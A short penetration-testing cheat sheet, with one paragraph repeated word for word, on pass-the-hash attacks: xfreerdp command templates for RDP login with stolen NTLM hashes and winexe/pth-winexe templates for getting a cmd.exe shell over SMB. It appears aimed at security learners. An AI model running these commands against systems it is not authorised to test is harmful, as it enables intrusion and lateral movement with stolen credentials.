We can utilize a tool in Kali Linux called xfreerdp to pass stolen NTLM hashes to RDP servers. The syntax would look like this:
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ipAddr>
We can utilize a tool in Kali Linux called xfreerdp to pass stolen NTLM hashes to RDP servers. The syntax would look like this:
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ipAddr>
If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.
Basic syntax w/ credentials.
winexe -U <domain/username>%<password> //<targetIP> cmd.exe
Basic syntax w/ NTLM hash (pass the hash technique).
pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe
Additional details about the command can be found here. https://tools.kali.org/maintaining-access/winexe